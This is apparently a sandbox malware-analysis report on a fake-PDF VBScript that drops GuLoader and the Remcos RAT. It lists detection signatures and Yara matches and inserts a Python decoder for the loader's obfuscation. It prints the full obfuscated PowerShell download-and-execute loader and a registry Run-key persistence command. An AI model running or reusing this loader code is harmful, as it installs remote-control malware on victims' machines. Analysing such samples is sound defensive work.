

Windows Analysis Report
REMIT_SCAN_00008917738378282733(PDF).vbs

Overview

General Information

Sample name:REMIT_SCAN_00008917738378282733(PDF).vbs
Analysis ID:1625389
MD5:e4db4e95f7490f85d6b5c611cf3e5f7d
SHA1:e914f253cefd81c3e684183a0b4171dbb7d3df86
SHA256:658bec8cf1deb44a7d98b8d74e9b8361e5b85e19579d679565e057788358091c

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Queries memory information (via WMI often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64native
  • wscript.exe (PID: 844 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REMIT_SCAN_00008917738378282733(PDF).vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 6212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. 
Rdje$progrLMetroOSkeokvHungrgDiaraeAn iaNUn ern ylase Bosum ,remG Fa tASkru.N UnmogVesicES.lloN idssE');Strejflyset ($Gavmildes);Strejflyset (Krigskunst ' alc$PrecaBUdligl MaurgDimiteHyperdM.croa B,rdlStatseshutonIlleg9Diama0Godma.Pre,lH GaneeMorala eldodScoureGoto.rH nfrsZoogl[ Di c$ Bl.md.onole Moder ,irsmTnk,muIndsmtGraylaLu,sutInculi Pulpo Ko.onperub]Towa =Vent.$Dynaso esiluSaalatSkmmeyOve.seg abblOoph,pReligs');$Sensorers=Krigskunst '.andi$ oslaBsuperlZannygCreateTelegdAbbedaProgrl,uropeGenevntudse9Haarb0 Swan.KolorD onceoCurumw rundnCent lhypopoUndifa orbrdBurghFAktani ephlSilkweKorne( Fdse$DispaTVejtrrSubv eEquindpesewjStabeeCarciiPrevinunnessFact.t empoaIn sknAmbrasO ervbHofteeTuschvBryggiForgilDisc l LempiVic dn Uhlagheliosfreds,Hypop$SvagsUDrejenNonshdUkonte ourcrDatelvW.odyiPyru.sMindseRe ssrSvovl)';$Underviser=$Vandomraade;Strejflyset (Krigskunst 'Fortr$B shwgSpeciL,kelco Plagbfo ivaSkovflKvste:Bi,man dspiOLivegn TorsaKasalnIrrita asselOperaO VotaG umbeICara,CHeftiaSygeflskovp=Rodek( rchpTNoninE kr.vsPletsT Lyp.-S,faePl wboACr.tiT JernHBurba pids$ kemuAk deN ForpdProceE MaanrSceptvSvabiIMinersU stieGleekRUdjvn)');while (!$Nonanalogical) {Strejflyset (Krigskunst ' ulla$Entosg Burgl rec oSammebJemmya J dglEater: ,skeS AnaecGlaneaReastlSmgtedBahamb.arsee TronrVotarr St syTekst=Extra$ eropT PerirCo.ubuNonastDlgedm nboouUd adnAngeldC nteeLonchs') ;Strejflyset $Sensorers;Strejflyset (Krigskunst 'Evele[Un,foTScholHExi,irKosseeLumpiAP,otuDFrikaISte,sN ChopGM seu.ErythtPcfdeHFleshR Gennese ieaVin cd tylo]Uplea:Sjusk:I dspSUnconLHydroe,onprERomanPAfli (Rad,o4 T rm0 Lage0Forsy0Prece)');Strejflyset (Krigskunst 'Ar iv$sn.ekG SwarlVomitO nsavBByt eAInv rl endi: findnZoophoDishwN InitA SupeNSubjeAFunktL ebeORentegErklriMammuCGips aFora lPulli=Mort ( kilt H lpEtyttes YahaTBlkha- RedrPPa.taAKa.katSul eh Ronn H ns$ aftuuRigsbn Vrnedordbie fodsRHorniVL fehi.kelnSM ndve Burhr Idio)') ;Strejflyset (Krigskunst 'Bakk,$ ParagDominlc teroWe.woB af iaGo.awL 
t,in:ProbenEkspoEUnassU fgrfRPersiiAdaptlR mase BeneM SnerAAper = Mogb$Soffig Sub.l ,ygoo SkylbTurria SagiLDd an:InstisPizzaU GamorSwolnm Af oUUnpolLFosfoE Roerr PalaSEfter+Bi sk+Glowu% F sc$SydslVElon ADybvaNCa.cedUnproDS,edvYAnaglbUnderDLibelESundhnGrsens Ge e.Hy ercDeva oTrachU .fknNSuffrT') ;$Tredjeinstansbevillings=$Vanddybdens[$Neurilema]}$Occipitallynsucken=314281;$Overlder=32250;Strejflyset (Krigskunst 'R lat$St.blG cy,nlp.pilODyresbRun la ArmhlFluxi:aftesOUd,odvScreeEUninhR AaerCUsmido vasimOffi.pListeEOplg,tUrinei GageTSpoo ITemaeONoctinAlli Afpre=Juste eart.gHomoge PosttEarli-Naarec Nikoolev,enV ctutbruseEManchnKu sptBestr Mets$ Scl uBrisan Lip dTetrae armlr UncuvEnforI Temps onmeeInt,rr');Strejflyset (Krigskunst ' V rd$E.erggB pril .reeo afk.bsemifa.raunlGens.: SpriVTrayaeV derjUndfalMu laeDagdrd emiseIschar,ilhreBegrin umbs B,ba Ant m=Kugle Cuart[BilabSCho eySkemasUndertUbef.eOvermmRevid.AugosC SpiroWhatnnCo plvFarvee YoldrClam tRent,]E sfo:Cardi:,asseF RifbrEthnooCentemO.erqBCox oaSid,ts UdtaeSinds6 Betr4 JernS,ersotRo inrAmperiStivenDatabgDem,n(gigan$KatedOGentlvhastveCountrra.ikc Tot oMiddlmFedtepCauloeUralit StraiFlad,tSauroiInteroHumannAnven)');Strejflyset (Krigskunst 'Slaab$BagatGBjergl,orklO OmstBKjolea SyneLYelpe:s,outf a.err ErotySanseSRivereblephdViki I Ark.SL.vnekBoligeCowp nBlasfE BrossS.ole Aesc =Samsv Tru,k[ Bhi sUgedayKontisNavneTjulolESalatmBo be.C,rnptMountEWhereX Mal tCyath. 
ilkaeAfb,nnSimulcArgumOBlooddSemihI,enteN ramGNonho]Paake: ers:Lith aEncepsUnderCOxim.IMand.IElite.A umiG edigEO nittAas.eSLocarT InterAlterIInf kNknip GU dve(turbo$ PrmivTilspEMastiJOdontLDryppetermiDReserEBritsR LindeirettnNu seSstrep)');Strejflyset (Krigskunst 'Somap$ LazugA.klalindt,OSpeciBRagsoA VomelHobby:in.lelSkibsNTlas GDatafsAnthrEHovedLH,yessCent,Fmagn UReserlBrnegdBrahmtcolor=Versi$ PostF Malfr re oyutilnsChrisE w,ckD Be.riDeko,sNonnakHjertETri.dn Pla.eDunkesBomme.Gratus CrepuTi.esbFo,etS La etEichwRRea tiRelatNTog.eG Indk(ga,el$FjumroSpaanCKritiCWi.teIFiskePAerogISter t ImmeA pbrlRdg,dl F otyHvepsnBachesKart u AmyrCBondekPreexE MoniNBetal, Swin$S eciOcub cvfourrEDim.nrBiog Lacr ddHnsleEHa sfR Au a)');Strejflyset $Lngselsfuldt;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • powershell.exe (PID: 3592 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Hles;function Strejflyset($Chefkokkes){ .($Postlachrymal) ($Chefkokkes)} function Krigskunst($Diplomatariers){$Occipitally=5;do{$undefinably+=$Diplomatariers[$Occipitally];Format-List;$Occipitally+=6} until(!$Diplomatariers[$Occipitally])$undefinably}$Lovgennemgangene=Krigskunst 'UdskrnHorrieGlyphTBagdi. atoW';$Lovgennemgangene+=Krigskunst 'Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant';$outyelps=Krigskunst ' R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/';$Affirmationerne=Krigskunst 'LrerfTDedoll Intess tte1Valut2';$Overkrslerne='Inden[HesitN,ainteJohnsTUnwea.OvergsFoursEKval,RacetyVRacefIHandlcAyensEMoun PSarono sseI lomn BlomTCatacmNonofAsimreNBygniACoqueG Kva,eKrat RKarse]Dermi:p.rvi:DelinSVeinae uthycOmphauLabo RChoktI reentGasbey evepStatirInf rodetaltcane oDyn ecEgadsO U emlKelso=St,rt$ raflaDeflofSom tfUnth I PhilrPrepgmBes.na.ilbut Sttyi Spr,oFusionB vareRethrRLabdan autoe';$outyelps+=Krigskunst 'Sn.er5Klods.Ps mm0Hypok Presi(FohatWAkkusiSeksunAeo idRefleoSheatwProcesSidst stikdNHandgTAntim mbel1Koll 0Hjtta. Opna0Bar u;Tr,ch A ndWNotouiCistsnRhomb6 Afsv4Damp,; elep snd gxCompe6 ircu4nedsl; Refo temnrMerrivT bul:spalt1 Bese3 Fors4Anti .Jo,fr0.ioly)Navle MariGLantheGapescPopulk GranoSla t/tekst2Whitt0K udd1Excur0,nfar0 imsf1Sklde0Convo1Rollm S rvFBibeliTh.rar Ci teRetiaf Halco Z ppxth,ee/Infla1 ryns3Acros4Trium.Forsg0';$dermutation=Krigskunst ' DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget';$Tredjeinstansbevillings=Krigskunst 'Fi kehH rcutSkudetSpitep Etro:Untea/endod/s alosOvermbPolyat hysieGenbrcS,amkhAssocu ilbsS uff.Unlugc .ortoMeu rm Geni/Flu tz.erviiantapgAnticiTyran/Sulf,H Anthe .ypenBonifgEv ngiestisvTishre BundlImmunsNappee Trafn S iss Krnk. 
RetfcGenlyhhumanm';$Textus=Krigskunst 'Am hi>';$Postlachrymal=Krigskunst 'B.deriF erdE HydrX';$Occipitallyncorruptibly='Unlax';$Emmensite='\Leveringstiden.Req';Strejflyset (Krigskunst 'Janic$ AndeGTerpilSkyldO Mal.bli.abaUnwinl weig:ForvuVKokosAWilliNLeje D PartO Udbym asypRWed eAMar aaDiiodd,ookeeGrund= Bead$Pa kwe DrivnCoracvTrick:BobleaT wlipSubtrplen pdHydr ABu.bitPinnuaB.dmt+Ene g$FolkeEkakerMNonosMOstraEM orhN AverSSystei accuTAfkryE');Strejflyset (Krigskunst 'Xyli,$ DiphGgif.eLBortfo.ottiBenglaAOvnenlWhi k: ,mrevLn,inaIldhun LoneD MariDBal,sYphilobCrackDRenteEMommanDecodSvarme=Lumin$QuizzttilslrNi htEKes.rd r faj HaanE M soIhektonReshosDisowTEccenaT,lemNZymicSFleecBArt se ,pprV For IUntelLDominL Chaei Forkn ,oncGNeds sTroa .For asP,ytiPAmidoLunderISuccetPepsi(Atomp$ overT micreHovmexOnychtGalgeUStol,sUnste)');Strejflyset (Krigskunst $Overkrslerne);$Tredjeinstansbevillings=$Vanddybdens[0];$Gavmildes=(Krigskunst 'Mater$KerfsgAdenolL.geroSupe,b pmosA ArgolStrad:ZapotbSuspelForkog BespeStdtrDCaly ASlyn Lfo,eneG,ydenForha9dvelr0Afteg=AttennbortgeImpl w Lapp-FuldhOMagisB arkiJb,ddeeUnexcCForlftHaspe pynteSTa peY ongS BommtBetale I,dhMDegra. 
Rdje$progrLMetroOSkeokvHungrgDiaraeAn iaNUn ern ylase Bosum ,remG Fa tASkru.N UnmogVesicES.lloN idssE');Strejflyset ($Gavmildes);Strejflyset (Krigskunst ' alc$PrecaBUdligl MaurgDimiteHyperdM.croa B,rdlStatseshutonIlleg9Diama0Godma.Pre,lH GaneeMorala eldodScoureGoto.rH nfrsZoogl[ Di c$ Bl.md.onole Moder ,irsmTnk,muIndsmtGraylaLu,sutInculi Pulpo Ko.onperub]Towa =Vent.$Dynaso esiluSaalatSkmmeyOve.seg abblOoph,pReligs');$Sensorers=Krigskunst '.andi$ oslaBsuperlZannygCreateTelegdAbbedaProgrl,uropeGenevntudse9Haarb0 Swan.KolorD onceoCurumw rundnCent lhypopoUndifa orbrdBurghFAktani ephlSilkweKorne( Fdse$DispaTVejtrrSubv eEquindpesewjStabeeCarciiPrevinunnessFact.t empoaIn sknAmbrasO ervbHofteeTuschvBryggiForgilDisc l LempiVic dn Uhlagheliosfreds,Hypop$SvagsUDrejenNonshdUkonte ourcrDatelvW.odyiPyru.sMindseRe ssrSvovl)';$Underviser=$Vandomraade;Strejflyset (Krigskunst 'Fortr$B shwgSpeciL,kelco Plagbfo ivaSkovflKvste:Bi,man dspiOLivegn TorsaKasalnIrrita asselOperaO VotaG umbeICara,CHeftiaSygeflskovp=Rodek( rchpTNoninE kr.vsPletsT Lyp.-S,faePl wboACr.tiT JernHBurba pids$ kemuAk deN ForpdProceE MaanrSceptvSvabiIMinersU stieGleekRUdjvn)');while (!$Nonanalogical) {Strejflyset (Krigskunst ' ulla$Entosg Burgl rec oSammebJemmya J dglEater: ,skeS AnaecGlaneaReastlSmgtedBahamb.arsee TronrVotarr St syTekst=Extra$ eropT PerirCo.ubuNonastDlgedm nboouUd adnAngeldC nteeLonchs') ;Strejflyset $Sensorers;Strejflyset (Krigskunst 'Evele[Un,foTScholHExi,irKosseeLumpiAP,otuDFrikaISte,sN ChopGM seu.ErythtPcfdeHFleshR Gennese ieaVin cd tylo]Uplea:Sjusk:I dspSUnconLHydroe,onprERomanPAfli (Rad,o4 T rm0 Lage0Forsy0Prece)');Strejflyset (Krigskunst 'Ar iv$sn.ekG SwarlVomitO nsavBByt eAInv rl endi: findnZoophoDishwN InitA SupeNSubjeAFunktL ebeORentegErklriMammuCGips aFora lPulli=Mort ( kilt H lpEtyttes YahaTBlkha- RedrPPa.taAKa.katSul eh Ronn H ns$ aftuuRigsbn Vrnedordbie fodsRHorniVL fehi.kelnSM ndve Burhr Idio)') ;Strejflyset (Krigskunst 'Bakk,$ ParagDominlc teroWe.woB af iaGo.awL 
t,in:ProbenEkspoEUnassU fgrfRPersiiAdaptlR mase BeneM SnerAAper = Mogb$Soffig Sub.l ,ygoo SkylbTurria SagiLDd an:InstisPizzaU GamorSwolnm Af oUUnpolLFosfoE Roerr PalaSEfter+Bi sk+Glowu% F sc$SydslVElon ADybvaNCa.cedUnproDS,edvYAnaglbUnderDLibelESundhnGrsens Ge e.Hy ercDeva oTrachU .fknNSuffrT') ;$Tredjeinstansbevillings=$Vanddybdens[$Neurilema]}$Occipitallynsucken=314281;$Overlder=32250;Strejflyset (Krigskunst 'R lat$St.blG cy,nlp.pilODyresbRun la ArmhlFluxi:aftesOUd,odvScreeEUninhR AaerCUsmido vasimOffi.pListeEOplg,tUrinei GageTSpoo ITemaeONoctinAlli Afpre=Juste eart.gHomoge PosttEarli-Naarec Nikoolev,enV ctutbruseEManchnKu sptBestr Mets$ Scl uBrisan Lip dTetrae armlr UncuvEnforI Temps onmeeInt,rr');Strejflyset (Krigskunst ' V rd$E.erggB pril .reeo afk.bsemifa.raunlGens.: SpriVTrayaeV derjUndfalMu laeDagdrd emiseIschar,ilhreBegrin umbs B,ba Ant m=Kugle Cuart[BilabSCho eySkemasUndertUbef.eOvermmRevid.AugosC SpiroWhatnnCo plvFarvee YoldrClam tRent,]E sfo:Cardi:,asseF RifbrEthnooCentemO.erqBCox oaSid,ts UdtaeSinds6 Betr4 JernS,ersotRo inrAmperiStivenDatabgDem,n(gigan$KatedOGentlvhastveCountrra.ikc Tot oMiddlmFedtepCauloeUralit StraiFlad,tSauroiInteroHumannAnven)');Strejflyset (Krigskunst 'Slaab$BagatGBjergl,orklO OmstBKjolea SyneLYelpe:s,outf a.err ErotySanseSRivereblephdViki I Ark.SL.vnekBoligeCowp nBlasfE BrossS.ole Aesc =Samsv Tru,k[ Bhi sUgedayKontisNavneTjulolESalatmBo be.C,rnptMountEWhereX Mal tCyath. 
ilkaeAfb,nnSimulcArgumOBlooddSemihI,enteN ramGNonho]Paake: ers:Lith aEncepsUnderCOxim.IMand.IElite.A umiG edigEO nittAas.eSLocarT InterAlterIInf kNknip GU dve(turbo$ PrmivTilspEMastiJOdontLDryppetermiDReserEBritsR LindeirettnNu seSstrep)');Strejflyset (Krigskunst 'Somap$ LazugA.klalindt,OSpeciBRagsoA VomelHobby:in.lelSkibsNTlas GDatafsAnthrEHovedLH,yessCent,Fmagn UReserlBrnegdBrahmtcolor=Versi$ PostF Malfr re oyutilnsChrisE w,ckD Be.riDeko,sNonnakHjertETri.dn Pla.eDunkesBomme.Gratus CrepuTi.esbFo,etS La etEichwRRea tiRelatNTog.eG Indk(ga,el$FjumroSpaanCKritiCWi.teIFiskePAerogISter t ImmeA pbrlRdg,dl F otyHvepsnBachesKart u AmyrCBondekPreexE MoniNBetal, Swin$S eciOcub cvfourrEDim.nrBiog Lacr ddHnsleEHa sfR Au a)');Strejflyset $Lngselsfuldt;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • msiexec.exe (PID: 1616 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 1400 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4780 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Motorskib" /t REG_EXPAND_SZ /d "%Markoerpositioner% -windowstyle 1 $Skan=(gi 'HKCU:\Software\Fjeldrreder\').GetValue('dvaergene');%Markoerpositioner% ($Skan)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
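The two powershell.exe command lines above are built almost entirely from calls to a tiny decoder, Krigskunst, which starts at index 5 of each literal and takes every sixth character; each decoded chunk is then handed to Strejflyset, which is `.("iEX") $chunk`, i.e. Invoke-Expression. The Python below is an added example for this report, not Joe Sandbox output and not the loader's own code: it reimplements that stride decoder, applies it to literals copied verbatim from the command line, and adds an integrity check, because several literals on this page have lost their non-ASCII junk characters (the Danish padding words) in extraction, which shifts the stride and corrupts the result. The variable names are the sample's; the length-modulo-six check is a heuristic assumption (the generator prefixes each payload character with five junk characters, so an untouched literal is a whole number of six-character groups).

```python
import re

STRIDE = 6   # five junk characters precede every payload character ...
START = 5    # ... so the first real character sits at index 5


def krigskunst(s: str) -> str:
    """Re-implementation of the loader's Krigskunst():
    $i=5; do { $out += $s[$i]; $i += 6 } until (!$s[$i]); $out
    PowerShell yields $null for an out-of-range index, so the loop just stops
    at the end of the string; a Python extended slice behaves the same way."""
    return s[START::STRIDE]


def is_intact(s: str) -> bool:
    """Heuristic: an unmodified literal is a whole number of (5 junk + 1 real)
    groups, so len % 6 == 0. A literal that lost characters (e.g. non-ASCII
    junk stripped during extraction, as on this page) fails the check and its
    decoded text must not be trusted."""
    return len(s) % STRIDE == 0


# Literals copied verbatim from the powershell.exe command line in this report,
# keyed by the PowerShell variable they are assigned to.
LITERALS = {
    "Postlachrymal":   ["B.deriF erdE HydrX"],                      # -> iEX  (Invoke-Expression)
    "Affirmationerne": ["LrerfTDedoll Intess tte1Valut2"],          # -> Tls12
    "dermutation":     [" DecaUjordsSA pliEExstirRhino-.arboaTaeniGBeh,nEEskatnBygget"],  # -> USEr-aGEnt
    "outyelps":        [" R stMEvoluoRed lzAf.riiPelskl,kupulhungaaKobra/"],              # -> Mozilla/
    "Textus":          ["Am hi>"],                                  # -> >
    # First half of $Lovgennemgangene as reproduced on this page is 29 chars
    # long, so at least one junk character was lost and the decode is broken.
    "Lovgennemgangene": ["UdskrnHorrieGlyphTBagdi. atoW",
                         "Lame ECzbiaB SrloCLarvelArthrINuthaeCha tN Grant"],
}


def decode_literals(literals=LITERALS) -> dict:
    """Map variable name -> (decoded text, every part passed the integrity check)."""
    return {
        name: ("".join(krigskunst(p) for p in parts), all(is_intact(p) for p in parts))
        for name, parts in literals.items()
    }


# Every single-quoted literal passed directly to Krigskunst in a command line.
KRIGSKUNST_CALL = re.compile(r"Krigskunst\s+'([^']*)'")


def decode_cmdline(cmdline: str) -> list:
    """Return (literal, decoded, intact) for each Krigskunst '...' call, in order."""
    return [(lit, krigskunst(lit), is_intact(lit)) for lit in KRIGSKUNST_CALL.findall(cmdline)]


if __name__ == "__main__":
    for name, (text, ok) in decode_literals().items():
        print(f"{name:17s} {'ok ' if ok else 'BAD'} {text!r}")
```

PowerShell identifiers are case-insensitive, so `iEX`, `USEr-aGEnt` and `Tls12` are Invoke-Expression, the User-Agent header and the TLS version the downloader sets; the mixed case is only there to dodge string matching. Run the decoder over the full command line with `decode_cmdline` and treat any literal flagged as not intact as unreliable rather than guessing at the missing characters.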
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\abios.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author
00000004.00000002.128210723875.0000000009E7D000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: powershell.exe PID: 6212 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 6212 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings:
        • 0x238e54:$b2: ::FromBase64String(
        • 0x455ee:$s1: -join
        • 0x47297:$s1: -join
        • 0xadb57:$s1: -join
        • 0xbac2c:$s1: -join
        • 0xbdffe:$s1: -join
        • 0xbe6b0:$s1: -join
        • 0xc01a1:$s1: -join
        • 0xc23a7:$s1: -join
        • 0xc2bce:$s1: -join
        • 0xc343e:$s1: -join
        • 0xc3b79:$s1: -join
        • 0xc3bab:$s1: -join
        • 0xc3bf3:$s1: -join
        • 0xc3c12:$s1: -join
        • 0xc4462:$s1: -join
        • 0xc45de:$s1: -join
        • 0xc4656:$s1: -join
        • 0xc46e9:$s1: -join
        • 0xc494f:$s1: -join
        • 0xc6ae5:$s1: -join
Process Memory Space: powershell.exe PID: 3592 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 3592 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings:
          • 0x3ffd4d:$b2: ::FromBase64String(
          • 0x13789d:$s1: -join
          • 0x13f928:$s1: -join
          • 0x38aaad:$s1: -join
          • 0x397b82:$s1: -join
          • 0x39af54:$s1: -join
          • 0x39b606:$s1: -join
          • 0x39d0f7:$s1: -join
          • 0x39f2fd:$s1: -join
          • 0x39fb24:$s1: -join
          • 0x3a0394:$s1: -join
          • 0x3a0acf:$s1: -join
          • 0x3a0b01:$s1: -join
          • 0x3a0b49:$s1: -join
          • 0x3a0b68:$s1: -join
          • 0x3a13b8:$s1: -join
          • 0x3a1534:$s1: -join
          • 0x3a15ac:$s1: -join
          • 0x3a163f:$s1: -join
          • 0x3a18a5:$s1: -join
          • 0x3a3a3b:$s1: -join
Source | Rule | Description | Author
amsi64_6212.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_3592.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Strings:
            • 0xc7e7:$b2: ::FromBase64String(
            • 0xb866:$s1: -join
            • 0x13a80:$s3: reverse
            • 0x5012:$s4: +=
            • 0x50d4:$s4: +=
